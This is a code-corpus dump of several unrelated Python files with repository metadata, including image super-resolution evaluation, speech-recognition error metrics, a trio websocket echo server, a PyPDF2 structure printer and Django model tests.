'bin/bert-multitask-serving-start',
],
keywords='bert nlp tensorflow machine learning sentence encoding embedding serving',
)
| 31.513514 | 88 | 0.689537 | 138 | 1,166 | 5.702899 | 0.65942 | 0.076239 | 0.035578 | 0.033037 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00733 | 0.180961 | 1,166 | 36 | 89 | 32.388889 | 0.816754 | 0 | 0 | 0 | 0 | 0 | 0.412521 | 0.102058 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.096774 | 0 | 0.096774 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10e6fa85535b14df08f37fcbddf1bff0af5b97fd | 1,418 | py | Python | utils/get_zssr_resutls.py | geopi1/Improved_USRNet | 06395641c30f3df2986cf70f7ceee6c9a5bc0aa9 | [
"MIT"
] | 20 | 2020-08-24T07:21:30.000Z | 2021-07-09T04:20:06.000Z | utils/get_zssr_resutls.py | geopi1/Improved_USRNet | 06395641c30f3df2986cf70f7ceee6c9a5bc0aa9 | [
"MIT"
] | 1 | 2020-10-21T08:02:18.000Z | 2021-01-17T23:29:58.000Z | utils/get_zssr_resutls.py | geopi1/Improved_USRNet | 06395641c30f3df2986cf70f7ceee6c9a5bc0aa9 | [
"MIT"
] | 3 | 2020-11-19T05:17:10.000Z | 2021-05-04T11:01:10.000Z | import matplotlib.pyplot as plt
import os
import numpy as np
import cv2
from skimage.metrics import structural_similarity as ssim
from USRNet.utils import utils_image as util
SMALL_SIZE = 24
MEDIUM_SIZE = 24
BIGGER_SIZE = 24
plt.rc('font', size=SMALL_SIZE) # controls default text sizes
plt.rc('axes', titlesize=SMALL_SIZE) # fontsize of the axes title
plt.rc('axes', labelsize=MEDIUM_SIZE) # fontsize of the x and y labels
plt.rc('xtick', labelsize=SMALL_SIZE) # fontsize of the tick labels
plt.rc('ytick', labelsize=SMALL_SIZE) # fontsize of the tick labels
plt.rc('legend', fontsize=SMALL_SIZE) # legend fontsize
plt.rc('figure', titlesize=BIGGER_SIZE) # fontsize of the figure title
res_dir = '/home/george/PycharmProjects/Statistical_im_proc/KernelGAN/results'
gt_dir = '/media/george/storge/USRNet/DIV2K_HR_ds2'
result_list = sorted(os.listdir(res_dir))
psnr_list = list()
ssim_list = list()
for folder in result_list:
    zssr_im = util.imread_uint(os.path.join(res_dir, folder, f'ZSSR_{folder}.png'))
    gt_im = util.imread_uint(os.path.join(gt_dir, f'{folder}.png'))
if gt_im is None or zssr_im is None:
continue
psnr_list.append(cv2.PSNR(gt_im,zssr_im))
ssim_list.append(ssim(gt_im,zssr_im, data_range=gt_im.max()-gt_im.min(), multichannel=True))
print(f'ZSSR PSNR: {np.mean(psnr_list):.2f}')
print(f'ZSSR SSIM: {np.mean(ssim_list):.3f}')
| 35.45 | 96 | 0.74048 | 236 | 1,418 | 4.266949 | 0.402542 | 0.034757 | 0.069513 | 0.084409 | 0.164846 | 0.142999 | 0.142999 | 0.09136 | 0.09136 | 0.09136 | 0 | 0.009812 | 0.137518 | 1,418 | 39 | 97 | 36.358974 | 0.813573 | 0.131171 | 0 | 0 | 0 | 0 | 0.195421 | 0.12592 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10e7411f57c3da0a14d3d7adf2d484d11b51d3c9 | 1,955 | py | Python | task/session.py | ScottWales/tasks | 7647c1b3cc7ee631029193d8416fd0f20de7a05d | [
"Apache-2.0"
] | null | null | null | task/session.py | ScottWales/tasks | 7647c1b3cc7ee631029193d8416fd0f20de7a05d | [
"Apache-2.0"
] | null | null | null | task/session.py | ScottWales/tasks | 7647c1b3cc7ee631029193d8416fd0f20de7a05d | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
"""
Copyright 2015 ARC Centre of Excellence for Climate Systems Science
author: Scott Wales <scott.wales@unimelb.edu.au>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import yaml
from . import rt
class Session(object):
"""
Holds a task manager session
"""
def __init__(self):
self.servers = {}
def read_config(self, path = None, value = None):
"""
Reads the config file at `path` and sets up servers
The config file is in yaml format, looking like::
---
server1:
kind: rt
url: rt.example.com
user: user
server2:
kind: trac
url: trac.example.com
"""
if value is not None:
config = yaml.safe_load(value)
else:
if path is None:
                path = os.path.join(os.environ['HOME'], '.tasks.rc')
with open(path, 'r') as f:
config = yaml.safe_load(f)
for name, c in config.iteritems():
self.add_server(name, url=c['url'], kind=c['kind'], user=c.get('user'))
def add_server(self, name, url, kind, user=None):
"""
Factory function for adding servers
"""
if kind == 'rt':
self.servers[name] = rt.Server(url, user)
elif kind == 'dummy':
self.servers[name] = None
else:
raise NotImplementedError()
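# Illustrative usage sketch (not part of the original module), feeding YAML of
# the shape shown in the read_config docstring directly as a string:
#
#     session = Session()
#     session.read_config(value="server1:\n  kind: dummy\n  url: x.example.com\n")
#     session.servers  # -> {'server1': None} (the 'dummy' kind)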
| 28.333333 | 83 | 0.59335 | 258 | 1,955 | 4.46124 | 0.523256 | 0.052129 | 0.022589 | 0.027802 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007413 | 0.309974 | 1,955 | 68 | 84 | 28.75 | 0.845812 | 0.496675 | 0 | 0.090909 | 0 | 0 | 0.03796 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.136364 | false | 0 | 0.090909 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10e7e48e445393fa9cddec8e7e757ee1303b32a4 | 5,058 | py | Python | src/okwugbe/metrics.py | edaiofficial/okwugbe | 74233162748a0a583c622e554c08d1d294758f1e | [
"MIT"
] | 5 | 2021-12-22T03:39:16.000Z | 2022-01-14T20:52:16.000Z | src/okwugbe/metrics.py | chrisemezue/okwugbe | e93266fc9d1af1104800efc332f76852d97ddf77 | [
"MIT"
] | 2 | 2021-12-22T23:50:26.000Z | 2021-12-28T03:58:14.000Z | src/okwugbe/metrics.py | chrisemezue/okwugbe | e93266fc9d1af1104800efc332f76852d97ddf77 | [
"MIT"
] | 3 | 2021-12-22T03:39:23.000Z | 2022-02-18T23:21:34.000Z | import numpy as np
class Metrics:
def __init__(self):
super(Metrics, self).__init__()
def _levenshtein_distance(self, ref, hyp):
"""
        :param ref: First sequence or sentence (a sequence of words/characters)
        :param hyp: Second sequence or sentence (a sequence of words/characters)
:return: the edit distance between both sequences
"""
m = len(ref)
n = len(hyp)
if ref == hyp:
return 0
if m == 0:
return n
if n == 0:
return m
if m < n:
ref, hyp = hyp, ref
m, n = n, m
distance = np.zeros((2, n + 1), dtype=np.int32)
for j in range(0, n + 1):
distance[0][j] = j
for i in range(1, m + 1):
prev_row_idx = (i - 1) % 2
cur_row_idx = i % 2
distance[cur_row_idx][0] = i
for j in range(1, n + 1):
if ref[i - 1] == hyp[j - 1]:
distance[cur_row_idx][j] = distance[prev_row_idx][j - 1]
else:
s_num = distance[prev_row_idx][j - 1] + 1
i_num = distance[cur_row_idx][j - 1] + 1
d_num = distance[prev_row_idx][j] + 1
distance[cur_row_idx][j] = min(s_num, i_num, d_num)
return distance[m % 2][n]
def avg_wer(self, wer_scores, combined_ref_len):
return float(sum(wer_scores)) / float(combined_ref_len)
def word_errors(self, reference, hypothesis, ignore_case=False, delimiter=' '):
"""Compute the levenshtein distance between reference sequence and
hypothesis sequence in word-level.
:param reference: The reference sentence.
:param hypothesis: The hypothesis sentence.
:param ignore_case: Whether case-sensitive or not.
:param delimiter: Delimiter of input sentences.
        :return: Levenshtein distance and number of words in the reference sentence.
"""
if ignore_case:
reference = reference.lower()
hypothesis = hypothesis.lower()
ref_words = reference.split(delimiter)
hyp_words = hypothesis.split(delimiter)
edit_distance = self._levenshtein_distance(ref_words, hyp_words)
return float(edit_distance), len(ref_words)
def char_errors(self, reference, hypothesis, ignore_case=False, remove_space=False):
"""Compute the levenshtein distance between reference sequence and
hypothesis sequence in char-level.
:param reference: The reference sentence.
:param hypothesis: The hypothesis sentence.
:param ignore_case: Whether case-sensitive or not.
:param remove_space: Whether remove internal space characters
:return: Levenshtein distance and length of reference sentence.
"""
if ignore_case:
reference = reference.lower()
hypothesis = hypothesis.lower()
join_char = ' '
if remove_space:
join_char = ''
reference = join_char.join(filter(None, reference.split(' ')))
hypothesis = join_char.join(filter(None, hypothesis.split(' ')))
edit_distance = self._levenshtein_distance(reference, hypothesis)
return float(edit_distance), len(reference)
def wer(self, reference, hypothesis, ignore_case=False, delimiter=' '):
"""Calculate word error rate (WER). WER compares reference text and
hypothesis text in word-level.
:param reference: The reference sentence.
:param hypothesis: The hypothesis sentence.
:param ignore_case: Whether case-sensitive or not.
:param delimiter: Delimiter of input sentences.
:return: Word error rate.
"""
edit_distance, ref_len = self.word_errors(reference, hypothesis, ignore_case,
delimiter)
if ref_len == 0:
raise ValueError("Length of the reference should be > 0.")
wer = float(edit_distance) / ref_len
return wer
def cer(self, reference, hypothesis, ignore_case=False, remove_space=False):
"""Calculate charactor error rate (CER). CER compares reference text and
hypothesis text in char-level. CER is defined as:
:param reference: The reference sentence.
:param hypothesis: The hypothesis sentence.
:param ignore_case: Whether case-sensitive or not.
:param remove_space: Whether remove internal space characters
:return: Character error rate.
:raises ValueError: If the reference length is zero.
"""
edit_distance, ref_len = self.char_errors(reference, hypothesis, ignore_case,
remove_space)
if ref_len == 0:
raise ValueError("Length of reference should be > 0.")
cer = float(edit_distance) / ref_len
return cer
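# A minimal usage sketch (not part of the original module) illustrating the
# metrics above; the example sentences are arbitrary.
if __name__ == '__main__':
    m = Metrics()
    # One substituted word out of three reference words.
    print(m.wer('quick brown fox', 'quick brown box'))  # 0.333...
    # One substituted character out of fifteen reference characters.
    print(m.cer('quick brown fox', 'quick brown box'))  # 0.0666...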
| 39.515625 | 89 | 0.5862 | 590 | 5,058 | 4.872881 | 0.172881 | 0.041739 | 0.014609 | 0.060522 | 0.65113 | 0.546435 | 0.519304 | 0.401043 | 0.378783 | 0.341217 | 0 | 0.009142 | 0.329577 | 5,058 | 127 | 90 | 39.826772 | 0.838691 | 0.316528 | 0 | 0.149254 | 0 | 0 | 0.025379 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.104478 | false | 0 | 0.014925 | 0.014925 | 0.268657 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10e801c7c91230517b18b1bc2bbf692c3cbfea50 | 946 | py | Python | Day 1/balance_binary.py | queercat/N-Days-Of-Leetcode | abf32ec9bef5afaeed9e5caa3618e2f09418260e | [
"MIT"
] | null | null | null | Day 1/balance_binary.py | queercat/N-Days-Of-Leetcode | abf32ec9bef5afaeed9e5caa3618e2f09418260e | [
"MIT"
] | null | null | null | Day 1/balance_binary.py | queercat/N-Days-Of-Leetcode | abf32ec9bef5afaeed9e5caa3618e2f09418260e | [
"MIT"
] | null | null | null | class Node():
def __init__(self, value=None, left=None, right=None):
self.value = value
self.left = left
self.right = right
    def is_balanced(self):
        # Compare subtree heights at the root; a missing child counts as 0.
        height_left = self.left.tree_height() if self.left else 0
        height_right = self.right.tree_height() if self.right else 0
        return abs(height_right - height_left) <= 1
    def tree_height(self):
        # Level-order (BFS) traversal: each pass over the queue consumes one
        # full level, so the number of completed passes equals the height.
        height = 0
        q = [self]
        while True:
            size = len(q)
            if size < 1:
                return height
            height += 1
            while size > 0:
                node = q.pop(0)
                if node.left:
                    q.append(node.left)
                if node.right:
                    q.append(node.right)
                size -= 1
    def __str__(self):
        return str(self.value)
root = Node(1)
root.left = Node(2)
root.right = Node(3)
root.left.left = Node(4)
root.left.right = Node(5)
root.right.right = Node(6)
root.right.right.right = Node(7)
root.right.right.right.right = Node(8)
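# The right subtree is a chain (3 -> 6 -> 7 -> 8) while the left has depth 2,
# so the tree is right-heavy: expect a height of 5 and is_balanced() == False.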
print(root.tree_height())
print(root.is_balanced()) | 16.310345 | 55 | 0.651163 | 152 | 946 | 3.934211 | 0.243421 | 0.117057 | 0.070234 | 0.063545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02008 | 0.210359 | 946 | 58 | 56 | 16.310345 | 0.780455 | 0 | 0 | 0.05 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0 | 0.025 | 0.25 | 0.05 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
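# A hedged side note on the exercise above (not part of the original file):
# is_balanced() only compares subtree heights at the root, while the usual
# "balanced binary tree" definition applies the check at every node. A
# minimal recursive version, assuming the Node class above:
#
# def is_balanced_everywhere(node):
#     def check(n):
#         # Height of n, or -1 as soon as any subtree is unbalanced.
#         if n is None:
#             return 0
#         left, right = check(n.left), check(n.right)
#         if left < 0 or right < 0 or abs(left - right) > 1:
#             return -1
#         return max(left, right) + 1
#     return check(node) >= 0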
10e8e4534667bb714882b3a04d470fb684fe8e21 | 1,724 | py | Python | with-javascript-clients/trio-websocket-server/next-server-example.py | anhinga/2019-python-drafts | d312e4c902f650fb4ad91b9ae7df934ab530a6c6 | [
"MIT"
] | 4 | 2019-05-27T15:31:24.000Z | 2021-02-17T12:55:58.000Z | with-javascript-clients/trio-websocket-server/next-server-example.py | anhinga/2019-python-drafts | d312e4c902f650fb4ad91b9ae7df934ab530a6c6 | [
"MIT"
] | null | null | null | with-javascript-clients/trio-websocket-server/next-server-example.py | anhinga/2019-python-drafts | d312e4c902f650fb4ad91b9ae7df934ab530a6c6 | [
"MIT"
] | 1 | 2021-02-17T12:56:00.000Z | 2021-02-17T12:56:00.000Z | import trio
from trio_websocket import serve_websocket, ConnectionClosed
import sys
import names
class SetOfNames:
def __init__(self, server_name):
self.server_name = server_name
self.dict_of_names = {}
who_is_who = SetOfNames('Server Ben')
async def echo_server(request):
print("ECHO SERVER")
ws = await request.accept()
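    # Draw random full names until one that is not already registered comes up.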
while True:
client_name = names.get_full_name()
if client_name not in who_is_who.dict_of_names:
            who_is_who.dict_of_names[client_name] = ws
print("KNOWN NAMES: ", set(who_is_who.dict_of_names.keys()))
print("PRESENT NAMES: ", [a for a in list(who_is_who.dict_of_names.keys()) if who_is_who.dict_of_names[a]])
print("NEW CLIENT: ", client_name)
break
await ws.send_message("From " + who_is_who.server_name + ": Your name is " + client_name)
while True:
try:
message = await ws.get_message()
print(message + " (message from " + client_name + ")")
await ws.send_message(message + " (" + who_is_who.server_name + " sending back to " + client_name + ")")
if message == "Stop Server":
for a in list(who_is_who.dict_of_names.keys()):
a_ws = who_is_who.dict_of_names[a]
if a_ws:
await a_ws.send_message("SERVER EXITING (by " + client_name + " request)")
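                # SystemExit raised here propagates out of trio.run() and
                # terminates the whole server process.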
sys.exit()
except ConnectionClosed:
who_is_who.dict_of_names[client_name] = None
break
async def main():
await serve_websocket(echo_server, '127.0.0.1', 8060, ssl_context=None)
trio.run(main)
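# A hedged client sketch (not part of the original file) for exercising the
# server above; open_websocket_url is trio_websocket's client-side entry point.
#
# import trio
# from trio_websocket import open_websocket_url
#
# async def client():
#     async with open_websocket_url('ws://127.0.0.1:8060') as ws:
#         print(await ws.get_message())   # "From Server Ben: Your name is ..."
#         await ws.send_message('hello')
#         print(await ws.get_message())   # echoed back with attribution
#
# trio.run(client)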
| 38.311111 | 119 | 0.611369 | 236 | 1,724 | 4.139831 | 0.275424 | 0.061412 | 0.09826 | 0.09826 | 0.282497 | 0.238485 | 0.191402 | 0.126919 | 0.067554 | 0.067554 | 0 | 0.008137 | 0.287123 | 1,724 | 44 | 120 | 39.181818 | 0.786819 | 0 | 0 | 0.105263 | 0 | 0 | 0.095708 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.026316 | false | 0 | 0.105263 | 0 | 0.157895 | 0.131579 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10ec056f054912cb4b0a801c882030b7aec58eb5 | 5,568 | py | Python | pypdf2_structures/pdf_obj_struct.py | GRV96/pypdf2_structures | a3dd07bef239d7ba899152ce61e1863dda9779a2 | [
"MIT"
] | 1 | 2021-07-19T22:03:13.000Z | 2021-07-19T22:03:13.000Z | pypdf2_structures/pdf_obj_struct.py | GRV96/pypdf2_structures | a3dd07bef239d7ba899152ce61e1863dda9779a2 | [
"MIT"
] | null | null | null | pypdf2_structures/pdf_obj_struct.py | GRV96/pypdf2_structures | a3dd07bef239d7ba899152ce61e1863dda9779a2 | [
"MIT"
] | null | null | null | """
This module allows to write a PDF object structure in a file stream. An object
structure consists of containers (dictionaries, lists, sets and tuples)
embedded in one another and other objects. This module also works on
structures that do not contain PDF objects.
"""
from PyPDF2.generic import BooleanObject, DictionaryObject, IndirectObject
_DLST = (dict, list, set, tuple)
_LT = (list, tuple)
_PAGE_KEYS = ("/Annots", "/Contents", "/CropBox", "/MediaBox",
"/Parent", "/Resources", "/Rotate", "/Tabs", "/Type")
_STREAM_WRITING_MODES = ("a", "a+", "r+", "w", "w+")
_CLOSING_BRACKET_COLON_SPACE = "]: "
_COLON_SPACE = ": "
_NEW_LINE = "\n"
_OPENING_BRACKET = "["
_PAGE_REF = "\tReference to a page\n"
_SPACE = " "
_TAB = "\t"
_UNEXPLORED_OBJS = "\t[...]\n"
def _index_between_brackets(index):
return _OPENING_BRACKET + str(index) + _CLOSING_BRACKET_COLON_SPACE
def _make_tabs(n):
return _TAB * n
def _obj_and_type_to_str(obj):
if isinstance(obj, BooleanObject):
return str(obj.value) + _SPACE + str(type(obj))
else:
return str(obj) + _SPACE + str(type(obj))
def obj_is_a_dlst(obj):
"""
Indicates whether the given object is a dictionary, a list, a set or a
tuple.
Args:
obj: any object
Returns:
bool: True if the object's type is dict, list, set or tuple, False
otherwise
"""
return isinstance(obj, _DLST)
def _obj_is_a_page(obj):
"""
Indicates whether the given object is a dictionary that represents a page
of a PDF file.
Args:
obj: any object
Returns:
bool: True if the object represents a PDF page, False otherwise.
"""
if isinstance(obj, DictionaryObject):
return tuple(obj.keys()) == _PAGE_KEYS
else:
return False
def _rslv_pdf_ind_object(obj):
if isinstance(obj, IndirectObject):
return obj.getObject()
else:
return obj
def _return_arg(obj):
return obj
def write_pdf_obj_struct(struct, w_stream, write_types=False,
rslv_ind_objs=False, depth_limit=0):
"""
Writes a PDF object structure in a file stream. The indentation indicates
which objects are contained in others. The stream's mode must be "a",
"a+", "r+", "w" or "w+". If argument struct is not a dictionary, a list,
a set or a tuple, this function will only write one line representing that
object.
Args:
struct: any object. Can be a container or not.
w_stream (TextIOWrapper): the file stream that will contain the
structure's representation
write_types (bool): If True, this function will write the contained
objects' type in the stream. Defaults to False.
rslv_ind_objs (bool): If True, the indirect objects found in the
structure will be resolved. Defaults to False. WARNING! Setting
this parameter to True can make the function exceed the maximum
recursion depth.
depth_limit (int): a limit to the recursion depth. If it is set to 0
or less, no limit is enforced. Defaults to 0.
Raises:
RecursionError: if this function exceeds the maximum recursion depth
        ValueError: if the stream's mode is incorrect
"""
if w_stream.mode not in _STREAM_WRITING_MODES:
raise ValueError("The stream's mode must be "
+ "\"a\", \"a+\", \"r+\", \"w\" or \"w+\".")
obj_str_fnc = _obj_and_type_to_str if write_types else str
ind_obj_fnc = _rslv_pdf_ind_object if rslv_ind_objs else _return_arg
if obj_is_a_dlst(struct):
w_stream.write(str(type(struct)) + _NEW_LINE)
rec_depth = 1
else:
rec_depth = 0
_write_pdf_obj_struct_rec(struct, w_stream, rec_depth,
depth_limit, obj_str_fnc, ind_obj_fnc)
def _write_pdf_obj_struct_rec(obj_to_write, w_stream, rec_depth,
depth_limit, obj_str_fnc, ind_obj_fnc):
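    # Writes one line per object, indented one tab per nesting level; lists,
    # dicts and sets recurse (up to depth_limit), while page dictionaries are
    # written as a short placeholder instead of being expanded.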
tabs = _make_tabs(rec_depth)
rec_depth += 1
if isinstance(obj_to_write, _LT):
length = len(obj_to_write)
for i in range(length):
item = ind_obj_fnc(obj_to_write[i])
line = tabs + _index_between_brackets(i)
if obj_is_a_dlst(item):
line += str(type(item))
w_stream.write(line + _NEW_LINE)
if _obj_is_a_page(item):
line = tabs + _PAGE_REF
w_stream.write(line)
elif depth_limit<=0 or rec_depth<=depth_limit:
_write_pdf_obj_struct_rec(item, w_stream, rec_depth,
depth_limit, obj_str_fnc, ind_obj_fnc)
else:
w_stream.write(tabs + _UNEXPLORED_OBJS)
else:
line += obj_str_fnc(item)
w_stream.write(line + _NEW_LINE)
elif isinstance(obj_to_write, dict):
for key, value in obj_to_write.items():
value = ind_obj_fnc(value)
line = tabs + str(key) + _COLON_SPACE
if obj_is_a_dlst(value):
line += str(type(value))
w_stream.write(line + _NEW_LINE)
if _obj_is_a_page(value):
line = tabs + _PAGE_REF
w_stream.write(line)
elif depth_limit<=0 or rec_depth<=depth_limit:
_write_pdf_obj_struct_rec(value, w_stream, rec_depth,
depth_limit, obj_str_fnc, ind_obj_fnc)
else:
w_stream.write(tabs + _UNEXPLORED_OBJS)
else:
line += obj_str_fnc(value)
w_stream.write(line + _NEW_LINE)
elif isinstance(obj_to_write, set):
for item in obj_to_write:
item = ind_obj_fnc(item)
line = tabs
if obj_is_a_dlst(item):
line += str(type(item))
w_stream.write(line + _NEW_LINE)
if _obj_is_a_page(item):
line = tabs + _PAGE_REF
w_stream.write(line)
elif depth_limit<=0 or rec_depth<=depth_limit:
_write_pdf_obj_struct_rec(item, w_stream, rec_depth,
depth_limit, obj_str_fnc, ind_obj_fnc)
else:
w_stream.write(tabs + _UNEXPLORED_OBJS)
else:
line += obj_str_fnc(item)
w_stream.write(line + _NEW_LINE)
else:
line = tabs + obj_str_fnc(obj_to_write)
w_stream.write(line + _NEW_LINE)
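# A hedged usage sketch (not part of the original module), assuming the legacy
# PyPDF2 PdfFileReader API that the imports above target:
#
# from PyPDF2 import PdfFileReader
#
# with open('input.pdf', 'rb') as pdf, open('structure.txt', 'w') as out:
#     reader = PdfFileReader(pdf)
#     write_pdf_obj_struct(reader.trailer, out, write_types=True, depth_limit=6)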
| 25.658986 | 78 | 0.713182 | 893 | 5,568 | 4.142217 | 0.183651 | 0.041633 | 0.048662 | 0.043255 | 0.390105 | 0.353068 | 0.346851 | 0.344147 | 0.326845 | 0.289808 | 0 | 0.002204 | 0.185165 | 5,568 | 216 | 79 | 25.777778 | 0.813092 | 0.331897 | 0 | 0.40708 | 0 | 0 | 0.041775 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.079646 | false | 0 | 0.00885 | 0.026549 | 0.176991 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10ed97d128b88ac1be3e9146a547173a352d36ad | 1,459 | py | Python | src/ralph/lib/custom_fields/tests/test_models.py | angry-tony/cmdb-ralph | eb2ad2212a133025b698eb48e379c0bfe14cace0 | [
"Apache-2.0"
] | null | null | null | src/ralph/lib/custom_fields/tests/test_models.py | angry-tony/cmdb-ralph | eb2ad2212a133025b698eb48e379c0bfe14cace0 | [
"Apache-2.0"
] | null | null | null | src/ralph/lib/custom_fields/tests/test_models.py | angry-tony/cmdb-ralph | eb2ad2212a133025b698eb48e379c0bfe14cace0 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from django import forms
from django.test import TestCase
from ..models import CustomField, CustomFieldTypes
from .models import SomeModel
class CustomFieldModelsTestCase(TestCase):
def setUp(self):
self.sm1 = SomeModel.objects.create(name='abc')
self.sm2 = SomeModel.objects.create(name='def')
self.custom_field_str = CustomField.objects.create(
name='test_str', type=CustomFieldTypes.STRING,
)
self.custom_field_str_with_default = CustomField.objects.create(
name='test_str_default', type=CustomFieldTypes.STRING,
default_value='default'
)
self.custom_field_choices = CustomField.objects.create(
name='test_choices', type=CustomFieldTypes.CHOICE,
choices='qwerty|asdfgh|zxcvbn',
)
def test_get_form_field_with_default(self):
form_field = self.custom_field_str_with_default.get_form_field()
self.assertIsInstance(form_field, forms.CharField)
self.assertEqual(form_field.initial, 'default')
def test_get_form_field_choicefield(self):
form_field = self.custom_field_choices.get_form_field()
self.assertIsInstance(form_field, forms.ChoiceField)
self.assertEqual(
form_field.choices,
[
('qwerty', 'qwerty'),
('asdfgh', 'asdfgh'),
('zxcvbn', 'zxcvbn'),
]
)
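# A hedged reconstruction (hypothetical, inferred only from the assertions
# above; not Ralph's actual code) of what CustomField.get_form_field() must
# roughly do to satisfy these tests:
#
# def get_form_field(self):
#     if self.type == CustomFieldTypes.CHOICE:
#         return forms.ChoiceField(
#             choices=[(c, c) for c in self.choices.split('|')],
#         )
#     return forms.CharField(initial=self.default_value)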
| 34.738095 | 72 | 0.64976 | 154 | 1,459 | 5.909091 | 0.285714 | 0.098901 | 0.093407 | 0.059341 | 0.363736 | 0.286813 | 0.101099 | 0.101099 | 0 | 0 | 0 | 0.002732 | 0.24743 | 1,459 | 41 | 73 | 35.585366 | 0.826047 | 0.014393 | 0 | 0 | 0 | 0 | 0.077994 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 1 | 0.088235 | false | 0 | 0.117647 | 0 | 0.235294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |